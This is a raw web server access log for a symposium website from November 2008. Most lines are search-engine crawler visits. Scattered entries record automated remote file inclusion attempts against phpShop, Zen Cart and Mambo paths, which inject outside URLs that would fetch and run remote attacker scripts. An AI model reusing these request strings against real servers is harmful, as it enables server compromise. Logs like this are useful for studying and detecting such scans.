72.30.161.235 - - [20/Nov/2008:09:57:20 -0500] "GET /logs/access.log HTTP/1.0" 200 349359 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.44 - - [20/Nov/2008:10:05:49 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; InfoPath.1; yplus 5.6.04b)" 0 www.geil-symposium.com
72.30.65.28 - - [20/Nov/2008:12:52:11 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.28 - - [20/Nov/2008:12:52:12 -0500] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
195.242.245.250 - - [20/Nov/2008:12:52:36 -0500] "GET /logs/access.log HTTP/1.1" 200 350167 "-" "j ausdwkkuy6vppkkjyjqqliphdrnsnmpioiir" 21 www.geil-symposium.com
124.115.0.102 - - [20/Nov/2008:13:57:37 -0500] "GET /robots.txt HTTP/1.1" 404 - "http://www.geil-symposium.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
66.235.124.38 - - [20/Nov/2008:14:19:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [20/Nov/2008:14:19:14 -0500] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
202.179.180.45 - - [20/Nov/2008:16:45:15 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [20/Nov/2008:16:45:20 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
86.127.0.95 - - [20/Nov/2008:20:22:31 -0500] "GET /logs/access.log HTTP/1.1" 200 351326 "-" "9e jdn cwmpquisuibvsuijon" 29 www.geil-symposium.com
208.111.154.15 - - [20/Nov/2008:21:33:51 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [20/Nov/2008:21:33:51 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.65.49 - - [21/Nov/2008:00:03:08 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.65.49 - - [21/Nov/2008:00:03:09 -0500] "GET /publications.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.54 - - [21/Nov/2008:00:14:43 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {7ADBF1D5-386B-43A3-B0C6-7E701EAA6905}; SV1)" 0 www.geil-symposium.com
208.111.154.16 - - [21/Nov/2008:02:52:02 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [21/Nov/2008:02:52:03 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.81.175 - - [21/Nov/2008:12:56:52 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.81.175 - - [21/Nov/2008:12:56:52 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.88 - - [21/Nov/2008:13:05:20 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.88 - - [21/Nov/2008:13:05:23 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.88 - - [21/Nov/2008:13:05:26 -0500] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.46 - - [21/Nov/2008:13:09:25 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {81C5C242-8D35-668E-2F8C-257FA808E6CA}; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
209.90.77.42 - - [21/Nov/2008:13:40:27 -0500] "GET //cart/errors.php?error=http://dungeonlair.com/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" 0 www.geil-symposium.com
209.90.77.42 - - [21/Nov/2008:13:40:29 -0500] "GET /logs//cart/errors.php?error=http://dungeonlair.com/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" 0 www.geil-symposium.com
67.71.50.189 - - [21/Nov/2008:13:42:27 -0500] "GET /logs//zencart/errors.php?error=http://dungeonlair.com/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" 0 www.geil-symposium.com
67.71.50.189 - - [21/Nov/2008:13:42:27 -0500] "GET //zencart/errors.php?error=http://dungeonlair.com/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" 0 www.geil-symposium.com
124.115.0.111 - - [21/Nov/2008:16:09:30 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.111 - - [21/Nov/2008:16:09:32 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
81.166.86.214 - - [21/Nov/2008:19:17:58 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://majestic12.co.uk/bot.php?I=CDA066C5C2-5724C63B0DC4F6C2-geil-symposium_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
81.166.86.214 - - [21/Nov/2008:19:17:59 -0500] "GET / HTTP/1.1" 200 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
81.166.86.214 - - [21/Nov/2008:19:17:59 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://majestic12.co.uk/bot.php?I=CDA066C5C2-5724C63B0DC4F6C2-www_geil-symposium_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
81.166.86.214 - - [21/Nov/2008:19:17:59 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
202.108.7.214 - - [21/Nov/2008:20:03:23 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [21/Nov/2008:20:03:23 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
208.111.154.15 - - [21/Nov/2008:20:40:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [21/Nov/2008:20:40:39 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
81.31.149.109 - - [21/Nov/2008:21:33:06 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://markin.siteburg.com/id.priv8.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" 0 www.geil-symposium.com
210.18.76.77 - - [21/Nov/2008:22:16:21 -0500] "GET /logs/access.log HTTP/1.1" 200 357123 "-" "rgntxfo1n1ddvbcxssfhoradpcmplwom" 4 www.geil-symposium.com
208.111.154.16 - - [22/Nov/2008:01:00:09 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [22/Nov/2008:01:00:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
38.99.13.124 - - [22/Nov/2008:02:03:36 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
68.177.202.43 - - [22/Nov/2008:02:46:27 -0500] "GET /logs/access.log HTTP/1.1" 200 357817 "-" "8Hgpr scpnmiumqishnrs" 3 www.geil-symposium.com
208.111.154.16 - - [22/Nov/2008:05:07:24 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Nov/2008:05:07:25 -0500] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.38 - - [22/Nov/2008:05:45:28 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Rogers Hi-Speed Internet; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1)" 0 www.geil-symposium.com
68.177.202.43 - - [22/Nov/2008:05:55:59 -0500] "GET /logs/access.log HTTP/1.1" 200 358568 "-" "lumtwyvoctjgshxsdLdqxqguxjehhjmot" 6 www.geil-symposium.com
67.15.60.41 - - [22/Nov/2008:06:11:31 -0500] "GET /logs/access.log HTTP/1.1" 200 358723 "-" "access_log-crawler" 2 www.geil-symposium.com
77.220.131.217 - - [22/Nov/2008:06:53:42 -0500] "GET / HTTP/1.1" 200 322 "http://otvetoff.ru/question/141513" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.9 (build 01863); .NET CLR 2.0.50727)" 0 www.geil-symposium.com
77.57.203.210 - - [22/Nov/2008:07:31:55 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 0 www.geil-symposium.com
77.57.203.210 - - [22/Nov/2008:07:31:56 -0500] "GET /logs/error.log HTTP/1.0" 200 112139 "-" "CHemSE/Nutch-0.9 (ChemSE_crawler; http://www.chemse.com; info123@chemse.com)" 1 www.geil-symposium.com
87.66.0.221 - - [22/Nov/2008:07:52:20 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.66.0.221 - - [22/Nov/2008:07:52:20 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
87.66.0.221 - - [22/Nov/2008:07:52:20 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
61.247.221.45 - - [22/Nov/2008:08:35:30 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.247.221.45 - - [22/Nov/2008:08:35:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.50.221.108 - - [22/Nov/2008:08:47:59 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
61.50.221.108 - - [22/Nov/2008:08:47:59 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
61.50.221.108 - - [22/Nov/2008:08:48:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
66.235.124.38 - - [22/Nov/2008:08:57:02 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [22/Nov/2008:08:57:02 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.55 - - [22/Nov/2008:09:11:23 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; (R1 1.1))" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:30:59 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:31:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:31:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:31:04 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:31:04 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
218.84.44.197 - - [22/Nov/2008:10:31:09 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
72.30.81.165 - - [22/Nov/2008:11:58:05 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.81.165 - - [22/Nov/2008:11:58:07 -0500] "GET /logs/error.log HTTP/1.0" 200 219684 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
198.87.2.45 - - [22/Nov/2008:12:29:32 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [22/Nov/2008:12:29:32 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
198.87.2.45 - - [22/Nov/2008:12:29:32 -0500] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:29:10 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:29:10 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:29:10 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:32:35 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:32:35 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
189.44.51.66 - - [22/Nov/2008:14:32:35 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:25 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:25 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:25 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:26 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:26 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
190.24.168.93 - - [22/Nov/2008:14:34:26 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
208.111.154.15 - - [22/Nov/2008:15:41:36 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [22/Nov/2008:15:41:36 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
122.203.18.68 - - [22/Nov/2008:16:04:57 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
122.203.18.68 - - [22/Nov/2008:16:04:58 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
122.203.18.68 - - [22/Nov/2008:16:04:58 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
220.181.61.192 - - [22/Nov/2008:18:27:43 -0500] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
124.115.0.169 - - [22/Nov/2008:21:24:55 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
124.115.0.169 - - [22/Nov/2008:21:24:55 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 0 www.geil-symposium.com
98.200.52.168 - - [22/Nov/2008:22:26:17 -0500] "GET / HTTP/1.1" 200 326 "http://search.yahoo.com/search?p=index+of+geil&ei=UTF-8&fr=yfp-t-501&xargs=0&pstart=1&b=31&xa=wLhmVNAHfWqdLEBx0wi_xQ--,1227497131" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 0 www.geil-symposium.com
98.200.52.168 - - [22/Nov/2008:22:26:17 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 0 www.geil-symposium.com
202.160.180.132 - - [23/Nov/2008:01:55:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [23/Nov/2008:01:55:41 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
72.30.142.82 - - [23/Nov/2008:06:35:31 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.82 - - [23/Nov/2008:06:35:31 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.15 - - [23/Nov/2008:07:38:57 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [23/Nov/2008:07:38:57 -0500] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
213.46.118.2 - - [23/Nov/2008:07:45:59 -0500] "GET / HTTP/1.1" 200 326 "http://www.google.nl/search?hl=nl&safe=off&client=firefox-a&channel=s&rls=org.mozilla%3Anl%3Aofficial&hs=FYE&q=index+of+geil&btnG=Zoeken&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" 0 www.geil-symposium.com
213.46.118.2 - - [23/Nov/2008:07:46:00 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" 0 www.geil-symposium.com
70.38.12.204 - - [23/Nov/2008:07:56:19 -0500] "GET /?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 www.geil-symposium.com
70.38.12.204 - - [23/Nov/2008:07:56:20 -0500] "GET /logs/?sourcedir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 385 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 www.geil-symposium.com
208.80.194.29 - - [23/Nov/2008:09:35:23 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.4; yplus 5.6.03b)" 0 www.geil-symposium.com
66.235.124.38 - - [23/Nov/2008:11:29:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [23/Nov/2008:11:29:56 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
38.100.8.50 - - [23/Nov/2008:11:40:34 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [23/Nov/2008:11:40:34 -0500] "GET / HTTP/1.1" 200 326 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [23/Nov/2008:11:40:35 -0500] "GET /logs HTTP/1.1" 301 343 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.50 - - [23/Nov/2008:11:40:35 -0500] "GET /logs/ HTTP/1.1" 200 385 "-" "panscient.com" 0 www.geil-symposium.com
208.80.194.45 - - [23/Nov/2008:12:29:00 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
210.18.76.77 - - [23/Nov/2008:13:01:26 -0500] "GET /logs/access.log HTTP/1.1" 200 372784 "-" "bTnkdblodvcqaehw1avggpue" 4 www.geil-symposium.com
208.111.154.15 - - [23/Nov/2008:14:43:02 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [23/Nov/2008:14:43:02 -0500] "GET /Scholarship.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [23/Nov/2008:15:21:33 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [23/Nov/2008:15:21:33 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [23/Nov/2008:19:03:52 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [23/Nov/2008:19:03:52 -0500] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
220.80.108.77 - - [23/Nov/2008:23:30:41 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.impulsegamer.com/newsletter/attachments/sistem.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
